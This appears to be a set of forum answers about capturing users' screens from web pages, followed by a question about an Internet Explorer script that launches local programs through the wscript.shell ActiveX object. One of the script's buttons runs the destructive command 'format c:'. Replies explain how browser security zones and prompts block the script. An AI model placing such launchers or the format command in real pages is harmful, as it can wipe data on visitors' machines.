I think you need ActiveX controls; without them I can't imagine how. You can have the user install them first; after installation on the client side the ActiveX controls should work and you can capture.
We are temporarily collecting Ajax states, data in form fields and session information. Then we re-render it at the support desk. Since we test and integrate for all browsers, there are hardly any support cases for display reasons.
Have a look at the red button at the bottom on holidaycheck
Alternatively there is html2canvas of Google. But it is only applicable for newer browsers and I've never tried it.
In JavaScript? No. I do work for a security company (sort of NetNanny type stuff) and the only effective way we've found to do screen captures of the user is with a hidden application.

Surprisingly, JavaScript code could execute any process it wants. Why?

I asked "How to run a executable file from a web page?"
Many people told me that's impossible, but my colleague find a piece of JavaScript code that could execute any process. I can not believe ActiveX is so dangerous.
How could this happen? Why this is not forbidden by IE?
<SCRIPT language=JavaScript>
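/**
 * Launch a local program through the Windows Script Host shell object.
 *
 * ActiveXObject exists only in Internet Explorer, and whether the call is
 * allowed depends on the security zone the page is loaded in and on the
 * user's answer to the ActiveX prompt. When it is allowed, the program is
 * started on the visitor's machine, which is why the object should stay
 * blocked for pages loaded from the network.
 *
 * @param {string} strPath command line handed to the shell object's Run method
 */
function Run(strPath) {
  try {
    var objShell = new ActiveXObject("wscript.shell");
    objShell.Run(strPath);
    objShell = null;
  } catch (e) {
    // Reached both when the program is missing and when the ActiveX object is
    // refused, so the message cannot tell the two apart. The closing quote
    // around the path was missing in the original message.
    alert('Can not find "' + strPath + '"');
  }
}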
</SCRIPT>
<BUTTON class=button onclick="Run('notepad')">notepad</BUTTON><br>
<BUTTON class=button onclick="Run('mspaint')">mspaint</BUTTON><br>
<BUTTON class=button onclick="Run('calc')">calc</BUTTON><br>
<BUTTON class=button onclick="Run('format c:')">format c:</BUTTON><br>
While you can do this IE will block it saying that there is an
ActiveX Control is trying to access
you computer, click here for options
You can only run these if the end user allows them too and hopefully people are clever enough not to allow it to run. If you do allow it then there is always another alert asking if you really want to run this so there should be enough security around it.
Local files run in a different security environment than remote files, so while that will work if you save the file as an html and open it from your computer, if you upload it on a server and try to run it from there it will not work.
Did you try this?
wscript.shell can't be used in this way from a web page loaded remotely. If you loaded the web page from a local file or have changed your security settings it might work but it won't work when loaded from a remote web server.
The good news is IE8 blocks this behaviour, even with a local file. I don't know about IE7, though I would imagine this is also the case. I would doubt it would work with a remote file, even with IE6, otherwise we would have had some major incident by now and a patch would have been issued.
It depends on your browser's security configuration. In some cases this piece of code will not be executed. But in any case the user will be asked to allow ActiveX to run the external process:
ActiveX Control is trying to access you computer, click here for options
